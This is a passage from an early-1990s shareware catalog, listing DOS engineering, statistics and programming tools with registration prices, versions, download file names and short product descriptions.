forum LIB 13 (multiple files) on CompuServe. + Download size: 57k + Description: + A module within the Facilities Management Section of the + Personal Consultant. It pulls data developed in FES & CLN into + overhead cost data by operation. It also allows data for + utilities, facility cost, taxes, insurance, etc. to be prorated + by operation. It doesn't attempt to develop data accurate to + the penny, but rather develops trends to point out possible + areas of concern in overhead cost management. Proper + evaluation of the Personal Consultant requires all 18 programs. + + Chapter 10, "Engineering" 272 + + + + Product: Space Relationship + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS3.EXE (multiple files) on BBSs; ALPS3.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 43k + Description: + The final module in the Facilities Management Section of the + Industrial Engineers Tool Box. It puts combined flow & sevice + affinities from Layout Planning in rank order in a table to be + used for CAD drawings of block layouts. It also provides the + length of the side of a square of the operation square footage, + as a starting place for the analyst to run from a square to + shape of best fit. Proper evaluation of the I E Tool Box + requires all 20 programs. + + Product: Space Relationship(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPPC3.EXE (multiple files) on BBSs; ALPPC3.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 43k + Description: + The final module in the Facilities Management Section of the + Personal Consultant. It puts combined flow and service + affinities from Layout Planning in rank order in a table to be + used for CAD drawings of block layouts. It also provides the + length of the side of a square of the operation square footage, + as a starting place for the analyst to run from a square to + shape of best fit. Proper evaluation of the Personal + Consultant requires all 18 programs. + + Chapter 10, "Engineering" 273 + + + + Product: Statistical + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + Rounds out the Industrial Engineers Tool Box, as each of the + study areas require statistical support. It sets up random + sampling schedules. Universal standard mean is used to avoid + bias. The program allows analysis of normal distribution, 't' + & chi square. For those who can't let go of tables, help + screens provide 's','t'& chi suare values. The program can + also perform regression & correlation analysis. Proper + evaluation of the I E Tool Box requires all 20 programs. + + Product: Statistical(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC3.EXE (multiple files) on BBSs; ALPPC3.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + Rounds out the Personal Consultant, as each of the study areas + require statistical support. It sets up random sampling + schedules. Universal standard mean is used to avoid bias. The + program allows analysis of normal distribution, `t' & chi + square. For those who can't let go of tables, help screens + provide `s', `t' & chi square values. The program can also + perform regression & correlation analysis. Proper evaluation + of the Personal Consultant requires all 18 programs. + + Chapter 10, "Engineering" 274 + + + + Product: Value Engineering + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $20.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 72k + Description: + A part of the Industrial Engineers Tool Box, while basically + here for the trained analyst, can be used by one who follows + the menus to select the VE team, develop functional activity + simplifications, & compare alternatives. The trained analyst + can use VE & OVAL (Organization Value Analysis Logic) to + analyze the office environment for possible down sizing. + Proper evaluation of the I E Tool Box requires all 20 programs. + + Product: Value Engineering(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $20.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 72k + Description: + A part of the Personal Consultant, while basically here for the + trained analyst, can be used by one who follows the menu to + select the VE team, develop functional activity + simplifications, & compare alternatives. The trained analyst + can VE & OVAL (Organization Value Analysis Logic) to analyze + the office environment for possible down sizing. Proper + evaluation of the Personal Consultant requires all 18 programs. + + Chapter 10, "Engineering" 275 + + + + Product: Volume,Hours & Productivity + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor; IE + Tool Box. + Author: ALPS Software, 719-269-1117 + Registration: $40.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 77k + Description: + Develops present & historical data for use in analyzing work + place performance by operation & tour. The program allows + inclusion of fringe hours for development of staffing needs + based on either a level daily average of year to date hours & + volume, or an adjusted daily average of ytd hours & volume. + The adjustment can be for either volume increase or desired % + of productivity increase. Proper evaluation of the IE Tool Box + requires all 20 programs. + + Product: Volume,Hours & Productivity(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $40.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 77k + Description: + Develops present & historical data for use in analyzing work + place performance by operation & tour. The program allows + inclusion of fringe hours for development of staffing needs + based on either a level daily average of year to date hours & + volume, or an adjusted daily average of ytd hours & volume. + The adjustment can be for either volume increase or desired % + of productivity increase. Proper evaluation of the Personal + Consultant requires all 18 programs. + + + 10.2 Electrical engineering + + Product: Easy Project + Project Management Software. See full description on page 219. + + Chapter 10, "Engineering" 276 + + + + Product: ELECTRON + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: H&P Software, 719-561-0810 + Registration: $10.00 + Registration benefits: Latest program version. No documentation + provided due to the type of program. + Version: 2.5 (04-23-91) + User benefits: Latest program version. No documentation provided + due to the type of program. + Look for: ELECTRON (multiple files) on BBSs. + Download size: 166k + Description: + 555 timer design / resistive attenuator design / ammeter & + voltmeter design / dB gain or loss / DC Ohms law / parallel + resistor calcs / resistor color coding / constant voltage loud + speaker design / characteristic impedance of coax / fractional + HP motor graphics / 3-phase transformer graphics / calculate + inductance or # of turns for coils / true power calculations / + find required pump HP / wire size tables / maximum wires in + conduit / motor current tables / RPM vs frequence / resonant + frequency. + + Product: PC-ECAP + Needs: IBM PC, DOS 2.0 or better. 384k RAM. IBM, Epson, or HP + LaserJet printer. + Author: Circuit Systems, 609-875-5433 + Registration: $79.00 + Registration benefits: Printed manual, master disks, mail/phone + support. + Version: 2.01 (02-03-92) + User benefits: Printed manual, master disks, mail/phone support. + Look for: PC-ECAP2.ZIP on BBSs (call 609-582-4753 to download it + at no charge). + Download size: 145k + Description: + This easy to use AC circuit analysis program will calculate + magnitude, phase, group delay, impedance, VSWR, and return loss + for your circuits. Completely menu driven. Can analyze + circuits with up to 40 nodes. Built in full screen editor with + "Help". Full screen file selector. Plots high res graphs on- + screen or on IBM/Epson 9 or 24 pin or HP LaserJet printers. + Supports all video adapters. Even makes bipolar transistor + models. Will utilize a math coprocessor if available. + + Chapter 10, "Engineering" 277 + + + + 10.3 Civil engineering + + Product: DICOGO + Needs: IBM PC, DOS 3.0 or better. + Author: DI Management Corporation, 513-831-4122 + Registration: $199.00 + Registration benefits: Printed manual, phone support. + Version: 3.0 (09-30-91) + User benefits: Printed manual, phone support. + Look for: availability unknown on BBSs; DICOG3.EXE in AUTODESK + forum LIB 13 on CompuServe. + Download size: 112k + Description: + Coordinate geometry program for use with CAD systems or on a + stand-alone basis. Can be run from ACAD, and will create a DXF + file to import into a drawing. Features include batch command + input, command line editing, automatic recording of keyboard + commands into a command file, and cross-referenced help. Will + annotate lines arcs, and areas. A demonstration batch file is + included. Lisp utils included to create command or point files + from a drawing. + + Product: PC-STRAN(tm) + 1-,2-,or 3-dimensional STRuctural ANalysis. See full + description on page 277. + + Product: PCBRIDGE(tm) + continuous beam structural analysis (bridges). See full + description on page 277. + + + 10.4 Structural analysis + + Product: PC-STRAN(tm) + Needs: IBM PC, DOS 2.1 or better. 448k RAM, CGA or Hercules + monitor. + Author: Joe Murphy, 608-274-1946 + Registration: $50.00 + Registration benefits: Master disks, upgrade discounts. + Version: 4.31 (04-01-91) + User benefits: Master disks, upgrade discounts. + Look for: STRAN431.ZIP on BBSs. + Download size: 369k + Description: + Performs a 1-,2-, or 3-dimensional structural analysis. Shows + graphically the structure mesh, deformed structure, load, + shear, moment, rotation and deflection member diagrams on + graphics monitors. Powerful features include the ability to + handle semi-rigid connections, zoom and rotate viewing angle, + calculate member self-weight, extraploation of trapezoid member + loads on member length or projected lengths (even on sloping + members). Uses an 80x87 if present. Example input files. + + Chapter 10, "Engineering" 278 + + + + Product: PCBRIDGE(tm) + Needs: IBM PC, DOS 2.1 or better. 256k RAM, CGA or Hercules + monitor. + Author: Joe Murphy, 608-274-1946 + Registration: $30.00 + Registration benefits: Master disks, upgrade discounts. + Version: 2.60 (01-01-90) + User benefits: Master disks, upgrade discounts. + Look for: BRDG260.ZIP on BBSs. + Download size: 88k + Description: + Analyses the forces on a continuous beam over simple supports. + Allows for differing stiffness and dead load between spans. + Gives maximum moment, shear and deflection diagrams (and + tabular output) using the 3-moment method. Also gives + ENVELOPES for moving loads. Uses a 80x87 if present. Option + for AASHTO or user-defined impact factor. Has 8 common vehicles + and 10 user-defined vehicles. + + + 10.5 Software tools + + 10.5.1 For other + + Product: NPS - Nominal Pipe Size + Needs: IBM PC, DOS 3.0 or better. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $29.95 + Registration benefits: Technical support and updates for 60 days. + Version: e1.2 (02-08-92) + User benefits: Technical support and updates for 60 days. + Look for: availability unknown on BBSs; PIPE12.ZIP in IBMAPP + forum LIB 13 on CompuServe. + Download size: 97k + Description: + NPS displays dimensional, weight and flow capacity data for a + wide range of piping materials and sizes. (over 2000 sizes of + standard and specialty pipes in over 25 different materials). + Easy to use menu driven format with user selectable dimensional + units (US, Imperial or metric) and display colors. A must for + all piping engineers and students. + + + 10.6 Other + + Product: NPS - Nominal Pipe Size + Displays data for different sizes of pipe. See full + description on page 278. + + Product: ORGANIZE! Professional Books + Cataloging system for professional books. See full description + on page 226. + + Chapter 10, "Engineering" 279 + + + + Product: Plot-Line + Needs: IBM PC, DOS 2.1 or better. HP compatible RS-232 digital + plotter. + Author: PlotSoft Solutions, 519-925-5468 + Registration: $25.00 + Registration benefits: Unlimited phone/CompuServe/mail support. + Version: 1.7 (01-04-91) + User benefits: Unlimited phone/CompuServe/mail support. + Look for: availability unknown on BBSs; P-LINE.EXE in ADESK forum + LIB 10 on CompuServe. + Download size: 40k + Description: + A command line TSR that can output Hewlett Packard (HP-GL) text + files created by other applications to HP or HP compatible + RS-232 plotters in the background. Can spool files matching a + common mask (ie *.plt) and plot them automatically in the + background while you continue to use your computer for other + work in the foreground. Works with all HP plotters. Uses the + TesSeRact Library for Ram Resident Programs and requires 36K to + go resident. + + Chapter 11, "Mathematics" 280 + + + + + + Chapter 11 + Mathematics + + + 11.1 General math + + Product: Dad's Choice + Children's math and graphics program. See full description on + page 329. + + Product: Mercury + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Real Software, 408-476-3550 + Registration: $49.00 + Registration benefits: Latest disk, printed manual, support. + Version: 2.06 (07-01-91) + User benefits: Latest disk, printed manual, support. + Look for: MERCURYZ.EXE on BBSs (call 408-476-1055 to download it + at no charge); MRCRY2.ZIP in IBMAPP forum LIB 13 (multiple + files) on CompuServe; MERCURY2.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 300k + Description: + Complete program for equation solving and graphics on the PC. + Similar to Borland's Eureka, but with many improvements. + + Product: Mom's Math + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Motes Educational Software, 501-442-5652 + Registration: $10.00 + Registration benefits: Mail support. Shareware disks of other + programs. + Version: 3.0 (03-03-92) + User benefits: Mail support. Shareware disks of other programs. + Look for: availability unknown on BBSs; MOMSMA.ZIP in IBMAPP + forum LIB 11 on CompuServe. + Download size: 65k + Description: + This math program is for children of all ages. It contains + arcade style math games and other modules for addition, + subtraction, multiplication, division, and pre-algebra. These + modules have multiple learning levels so your child will never + outgrow the program. + + Chapter 11, "Mathematics" 281 + + + + Product: WinGraph [***] + Needs: IBM PC, Windows 3.0 or better. + Author: XWare, Inc., 212-262-4982 + Registration: $35.00 + Registration benefits: Master disks. + Version: 1.00 (04-05-92) + User benefits: Master disks. + Look for: WNGRPH1.ZIP on BBSs; WNGRPH.ZIP in WINADV forum LIB 1 + on CompuServe; WNGRPH1.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 70k + Description: + This equation graphing program for Windows 3.x includes: + cartesian coordinate graphs in 2D and 3D, polar coordinate + graphs, solutions to equations, simultaneous 2D graphs, + variable solution ranges, rotation and zoom of 3D graphs, + printing, and use of the Windows clipboard for transferring + graphs to other applications. A powerful tool for scientists + and mathmeticians, it's designed for ease of use and is + therefore highly suitable for students and teachers. + + + 11.2 Mandelbrot + + Product: Recursive Realm + Needs: IBM PC, DOS 2.0 or better. EGA monitor. Mouse + recommended. + Author: Austin Software Design, 303-242-7606 + Registration: $20.00 + Registration benefits: Master disks, bonus pictures, bonus + utilities, upgrade discounts. + Version: 3.0 (09-01-91) + User benefits: Master disks, bonus pictures, bonus utilities, + upgrade discounts. + Look for: RR*.ZIP (multiple files) on BBSs; RR*.EXE in IBMNEW + forum LIB 5 (multiple files) on CompuServe. + Download size: 320k + Description: + This fractal exploration tool is designed with the user in + mind. A mathematical education is not needed to explore its + stunning fractal images. Explore 22 equations including the + Mandelbrot set, Julia sets, Newton's Method, or Models of + Magnetism. Features mouse support, PCX format, 3-D, spheres, + jigsaw puzzles, and an easy-to-use menu with help available + everywhere. Integer-emulation and Mariani's algorithm make One + of the fastest fractal explorers available. + + + 11.3 Statistics + + Product: FDplot + A quick scientific function/data & stat plot. See full + description on page 312. + + Chapter 11, "Mathematics" 282 + + + + Product: KWIKSTAT + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: TexaSoft, 214-291-2115 + Registration: $49.00 + Registration benefits: Printed manual, discounts on new versions, + Kwikbits newsletter. + Version: 2.1 (05-24-91) + User benefits: Printed manual, discounts on new versions, + Kwikbits newsletter. + Look for: KS21-*.ZIP (multiple files) on BBSs; KS21-*.ZIP in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 600k + Description: + A menu driven statistical data analysis system designed by + professional statisticans. It reads and creates dBASE type + files and allows data entry from keyboard as ASCII files. + Features include simple descriptive statistics, graphs, t- + tests, analysis of variance, crosstabulations, survival + analysis and more. Supports missing values. PC Week called it + the "Numbers Game Winner." Thousands of users in the U.S. and + over 30 countries. + + Product: Lotto Challenger + Picks numbers to play and generates tickets. See full + description on page 367. + + Product: PathProj + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: softRX shareware + Registration: $25.00 + Registration benefits: Newsletter; Answers to Mailed-In Questions + on Ridge Theory/Applications. + Version: 9103 (03-01-91) + User benefits: Newsletter; Answers to Mailed-In Questions on + Ridge Theory/Applications. + Look for: availability unknown on BBSs; RXPATH.EXE in IBMAPP + forum LIB 13 on CompuServe. + Download size: 75k + Description: + Interactive CGA graphical display of the projection of + generalized ridge regression "shrinkage path" statistics + (either regression coefficients and the inferior direction or + else regressor coordinates) onto any 2-dimensional linear + subspace. Select your subspace using any pair of orthogonal + direction cosine vectors, then literally watch the inferior + direction change as you step along the ridge shrinkage path. A + bounce-bar menu helps you select RXridge output files for + importing to PathProj. + + Chapter 11, "Mathematics" 283 + + + + Product: PCStat + Needs: IBM PC, DOS 2.0 or better. 640k RAM. Hard disk or 720k + floppy drive. + Author: PC Information Systems, 702-342-0376 + Registration: $45.00 + Registration benefits: Printed manual, support. + Version: 2.3 (08-01-91) + User benefits: Printed manual, support. + Look for: PCSTAT23.ZIP on BBSs (call 702-849-2207 to download it + at no charge); PCSTAT.ZIP in IBMAPP forum LIB 13 on CompuServe. + Download size: 305k + Description: + Superb new descriptive statistics report program for varible + data. Easy to use even for statistics or computer novices. + Lotus like user interface enhanced with pull-down menus. Sample + report. Context sensitive help. Accepts Lotus, ASCII, DIF and + prepared dBase data. Manual keying in of data also possible. + Professional reports are uncomplicated to comprehend and ideal + for many business and industry situations. + + Product: RXridge + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: softRX shareware + Registration: $25.00 + Registration benefits: Newsletter; Answers to Mailed-In Questions + on Ridge Theory/Applications. + Version: 9104 (04-01-91) + User benefits: Newsletter; Answers to Mailed-In Questions on + Ridge Theory/Applications. + Look for: availability unknown on BBSs; RXRIDG.EXE in IBMAPP + forum LIB 13 on CompuServe. + Download size: 117k + Description: + Ridge Regression Computations/Graphics System: Performs all + calculations for classical, maximum likelihood methods of 2- + parameter generalized ridge regression. Handles exact + (numerical) singularities as well as statistically ill- + conditioned regression prolems. Pop-Up Window/Menus interface + with interactive, on-screen annotation of CGA graphics screens. + RXridge.EXE automatically writes detailed TRACE output to ASCII + files ready for import by RXtraces.EXE and PathProj.EXE. + + Chapter 11, "Mathematics" 284 + + + + Product: RXtraces + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: softRX shareware + Registration: $25.00 + Registration benefits: Newsletter; Answers to Mailed-In Questions + on Ridge Theory/Applications. + Version: 9103 (03-01-91) + User benefits: Newsletter; Answers to Mailed-In Questions on + Ridge Theory/Applications. + Look for: availability unknown on BBSs; RXTRAC.EXE in IBMAPP + forum LIB 13 on CompuServe. + Download size: 70k + Description: + Interactive CGA graphical displays of all 5 types of + generalized ridge regression TRACES (i.e. of regression + coefficients, scaled mean squared errors, excess eigenvalues, + inferior direction cosines, or the shrinkage pattern.) Ideal + for ridge training and/or self-paced learning applications + where students review RXridge outputs across a wide spectrum of + previously-computed numerical examples. A bounce-bar menu + helps you select RXridge.EXE output files for importing to + RXtraces.EXE. + + + 11.4 Other + + Product: FDplot + A quick scientific function/data & stat plot. See full + description on page 312. + + Chapter 12, "Programming" 285 + + + + + + Chapter 12 + Programming + + + 12.1 CASE tools + + Product: The Laughing Dog Screen Maker [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Yardbird Software, 818-704-6402 + Registration: $35.00 + Registration benefits: Printed manual, master disks, bonus + screens. + Version: 1.00 (04-12-92) + User benefits: Printed manual, master disks, bonus screens. + Look for: LDOG100.ZIP on BBSs (call 818-701-7465 to download it + at no charge); LDOG10.ZIP in IBMPRO forum LIB 6 on CompuServe; + LDOG100.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 300k + Description: + Standard mouse/kbd interface makes designing screens as easy as + using a Windows paint program. Features pop-up menus, hotkeys, + and on-screen toolbar. Save screens in compressed .DOG format + or export as binary, ANSI, BSAVE, EPS, WildCat!, PCBoard, or as + batch-enhansing .COM files. Source code generated in BASIC, + Pascal, C, and assembly language. Print screens on most dot- + matrix and laser printers including PostScript. Screen capture + and slide-show presentation utilities included. EASY to learn & + use! + + Product: TesSeRact Screen Designer + Code-Generator for TCXL. See full description on page 292. + + + 12.2 Desktop tools for programmers + + Product: ALLY + AutoLISP analyzer/Programer's workbench. See full description + on page 343. + + Product: Browse/2 + OS/2 file viewer for ASCII and hex data. See full description + on page 40. + + Product: FILE PATCH + File manipulation utility. See full description on page 33. + + Product: pEDIT PLUS + The personal EDITor PLUS. See full description on page 129. + + Chapter 12, "Programming" 286 + + + + Product: Prgmr's Productivity Pack Lite + Needs: IBM PC, DOS 2.0 or better. + Author: Falk Data Systems, 915-584-7670 + Registration: $19.00 + Registration benefits: Current version on disk, Bonus Disk, free + technical support, 60 day money back guarantee, Free CompuServe + Introductory Membership, Discounts on other products and + publications. + Version: 1.01 (03-25-90) + User benefits: Current version on disk, Bonus Disk, free + technical support, 60 day money back guarantee, Free CompuServe + Introductory Membership, Discounts on other products and + publications. + Look for: PPLITE.ZIP on BBSs; PPLITE.ZIP in IBMPRO forum LIB 6 on + CompuServe. + Download size: 256k + Description: + Programmer's Calculator providing full shift, rotate, logical, + and mathematical operations on full 32-bit values, in decimal, + hexadecimal, octal and binary simultaneously. Pop-Up ASCII and + Color Attribute Chart. Keystroke Reference Center. Pop-Up DOS + Shell and more. Swapping memory-resident version keeps only 7K + bytes of normal DOS memory while resident. May also run in + stand-alone mode (not memory-resident). Fully customizable. + DESQview-aware. Received excellent magazine reviews! + + Product: Programmer's Productivity Pack + Needs: IBM PC, DOS 2.0 or better. + Author: Falk Data Systems, 915-584-7670 + Registration: $79.00 + Registration benefits: Bound printed manual, ASCII Poster Set, + Bonus Disk Set, 60 day money back guarantee, free technical + support, Free CompuServe Introductory Membership, Discounts on + other products and publications. + Version: 2.61 (05-12-91) + User benefits: Bound printed manual, ASCII Poster Set, Bonus Disk + Set, 60 day money back guarantee, free technical support, Free + CompuServe Introductory Membership, Discounts on other products + and publications. + Look for: PPP26*.ZIP (multiple files) on BBSs; PPP26*.ZIP in + IBMPRO forum LIB 6 (multiple files) on CompuServe. + Download size: 404k + Description: + An integrated collection of tools for programmers. Programmer's + Calculator which works in decimal, hexadecimal, binary and + octal simultaneously. Operations include bit shifts and + rotates, AND, NOT, OR, XOR, and more. Full 32-bit values. Pop- + Up ASCII and Color Attribute Chart. Keystroke Reference Center. + Keystroke Recording and Playback. Lots more. Swapping version + keeps only 7K of DOS memory while resident. + + "Outstanding" "Highly recommended" + + -- PC World -- Dr. Dobb's Journal + + Chapter 12, "Programming" 287 + + + + Product: WinBatch + Windows Batch Language. See full description on page 73. + + Product: WinEdit + Perfect ASCII editor for Windows 3.0. See full description on + page 131. + + + 12.3 Languages + + See also: Database applications, Software tools (page 165). + + 12.3.1 Assembler + + Product: Programmer's SUPER-MAINT + The "easier" make utility. See full description on page 296. + + 12.3.2 BASIC + + Product: Convert To Structured BASIC + Convert GW to Structured Basic for compiling. See full + description on page 300. + + Product: PBfmt + Needs: IBM PC, DOS 3.0 or better. + Author: Unique Software + Registration: $19.95 + Registration benefits: Reduced rate upgrades; notification of + major upgrades; tech support by Fax and/or CompuServe Mail. + Version: 1.99 (07-21-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; tech support by Fax and/or CompuServe Mail. + Look for: PB-FMT on BBSs; PB-FMT.EXE in PCVENB forum LIB 12 on + CompuServe. + Download size: 84k + Description: + Formats Power Basic Source code the way you want it. + * works with or without line #'d source + * all structures handled and indented properly + * case choices of UPPER, lower, Capital, no change + * select case for labels, keywords, variables, sub/fn names + * fast formatting option + * makes mis-matched IF / END IF's easy to find + + Chapter 12, "Programming" 288 + + + + Product: PBMouse + Needs: IBM PC, DOS 2.1 or better. PowerBASIC v2.10. + Author: Barry Erick, 717-675-3432 + Registration: $10.00 + Registration benefits: Source to the PBU file. + Version: 1.0 (01-01-91) + User benefits: Source to the PBU file. + Look for: availability unknown on BBSs; PBMICE.EXE in PCVENB + forum LIB 12 on CompuServe. + Download size: 35k + Description: + More than just another Mouse Interface for PowerBASIC. This + utility includes: + * More than 12 text mouse cursors + * More than 25 graphics mice cursors + * Add your own mouse cursors! + * Tie the mouse to the system clock + * A tsr routine. + * 5 demos show off these features. + Full DOC file along with the Include and OBJ code file make up + this utility. + + Product: PBWindows + Needs: IBM PC, DOS 2.1 or better. PowerBASIC v2.10 (any sub + version). + Author: Barry Erick, 717-675-3432 + Registration: $25.00 + Registration benefits: Source code and printed manual. + Version: 2.5 (09-01-91) + User benefits: Source code and printed manual. + Look for: availability unknown on BBSs; PBWNDO.ZIP in PCVENB + forum LIB 12 on CompuServe; PBWINDOW.ZIP in IBMPC RTC LIB 8 on + GEnie. + Download size: 110k + Description: + A wonderful windowing utility. Just include PBWINDOWS.INC in + your program and start creating all types of windows and menus. + Now supports MOUSE and EGA/VGA 43/50 line modes. + * Any size window + * Shadows, Transparent and solid + * Scrolling + * Moving + * 12 Title Zones + * Recoloring + * PopUp + * Restore original window + * Works with Mono systems + * Mouse Support + * EGA/VGA 43/50 line + * PBWTools Included for system information + + Chapter 12, "Programming" 289 + + + + Product: Q4Tool + Needs: IBM PC, DOS 2.1 or better. QuickBASIC 4.x. + Author: CareWare, 916-477-6024 + Registration: $20.00 + Registration benefits: Phone/CompuServe/mail support. + Version: 1.5 (02-08-92) + User benefits: Phone/CompuServe/mail support. + Look for: availability unknown on BBSs; Q4T15.ZIP in IBMPRO forum + LIB 4 on CompuServe; Q4T15.ZIP in IBMPC RTC LIB 8 on GEnie. + Download size: 85k + Description: + An innovative collection of programming tools for QuickBASIC + 4.x. Features a comprehensive selection of mouse functions, a + unique windowing routine, fast screen save/restore routines, + fast single routine string writes, new pull down bar menu + routine, get/set equipment status routines, access to DOS + services and more. Contains nearly everything needed to create + fast, attractive, mouse driven applications. Demo with source + included. + + Product: Simply Help! + EXE/TSR/QuickBASIC Hypertext Help systems. See full + description on page 303. + + Product: STARTREK the Computer Program + Teaches programming, using the Star trek game. See full + description on page 408. + + 12.3.3 C + + Product: CtrlcLib + Needs: IBM PC, DOS 3.0 or better. Microsoft C, Turbo-C, or + Turbo-C++ compiler. + Author: Trendtech Corporation, 201-694-8622 + Registration: $30.00 + Registration benefits: Full C Source Code, NO assembler; Use in + your products royalty-free; s,m,c,l model libraries. + Version: 1.0 (01-01-91) + User benefits: Full C Source Code, NO assembler; Use in your + products royalty-free; s,m,c,l model libraries. + Look for: CTRLC1.ZIP on BBSs; CTRLC1.ZIP in IBMPRO forum LIB 3 on + CompuServe. + Download size: 167k + Description: + A unique library of user-initiated interrupt management + functions for C programmers. Your software products can control + all types of user-initiated interrupts and program "breaks": + you can trap CTRL-C, CTRL-BREAK, CTRL-2, and ALT-3, eliminate + the insidious "^C" displayed on the screen; block the "pause" + keys, the prt-screen keys and others. Functions to trap system + reset; force a warm/cold reboot. More functions control + settings of all 'lock' keys: capslock, numlock, etc. + + Chapter 12, "Programming" 290 + + + + Product: KEYTREE UTILITIES + Needs: IBM PC, DOS 2.1 or better. C compiler. + Author: REWSE CONSULTANTS LIMITED + Registration: $50.00 + Registration benefits: Technical support by mail. + Version: 3.10 (08-01-91) + User benefits: Technical support by mail. + Look for: KEYTREE.ZIP on BBSs. + Download size: 300k + Description: + This set of library routines for C programmers create and + maintain randomly accessed files of variable length records. + The indexing algorithm requires only sufficient of the record + key to ensure uniqueness before reading a record (if you have + only one customer whose name starts with Z, you get the record + as soon as you type Z). Any number of files may be opened, and + each may have up to 10 multi-field keys. Many other features. + + Product: LiteComm(tm) for Microsoft C + Needs: IBM PC, DOS 2.0 or better. Microsoft C 5.1 or better. + Author: Information Technology, Ltd., 401-724-2730 + Registration: $65.00 + Registration benefits: Full source code as well as additional + bonus programs. + Version: 6.00 (07-01-91) + User benefits: Full source code as well as additional bonus + programs. + Look for: MCOMM.ZIP on BBSs; MCOMM.ZIP in IBMPRO forum LIB 3 on + CompuServe; MCOMM.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 125k + Description: + Need asynch communications in your application? This is the + answer. Makes using communications as simple as reading a file. + Supports up to four COM ports simultaneously, even at high + speeds. Fullly interrupt driven, yet requires no in-depth + technical knowledge. In use by ATT, NASA, GM, AP, and many + others. + + Product: LiteComm(tm) for Turbo C + Needs: IBM PC, DOS 2.0 or better. Turbo C version 2.0 or better. + Author: Information Technology, Ltd., 401-724-2730 + Registration: $65.00 + Registration benefits: Full source code as well as additional + bonus programs. + Version: 6.00 (07-01-91) + User benefits: Full source code as well as additional bonus + programs. + Look for: TCOMM.ZIP on BBSs; TCOMM.ZIP in BPROGB forum LIB 5 on + CompuServe; TCOMM.ZIP in BORLAND RTC LIB 2 on GEnie. + Download size: 125k + Description: + Need asynch communications in your application? This is the + answer. Makes using communications as simple as reading a file. + Supports up to four COM ports simultaneously, even at high + + Chapter 12, "Programming" 291 + + + + speeds. Fullly interrupt driven, yet requires no in-depth + technical knowledge. In use by ATT, NASA, GM, AP, and many + others. + + Product: Programmer's SUPER-MAINT + The "easier" make utility. See full description on page 296. + + Product: TCXL User Interface Development + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $50.00 + Registration benefits: Printed Manual and Diskettes. + Version: 5.52 (09-01-91) + User benefits: Printed Manual and Diskettes. + Look for: availability unknown on BBSs; TCXL-?.ZIP in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 1000k + Description: + This development system supplements your compiler's + capabilities by providing more than 400 functions which make + complex user interfaces simple to program. Also includes data- + entry forms, context sensitive help, automatic mouse support, + and more. + + Product: TesSeRact Compression System + Needs: IBM PC, DOS 2.1 or better. . + Author: Innovative Data Concepts, 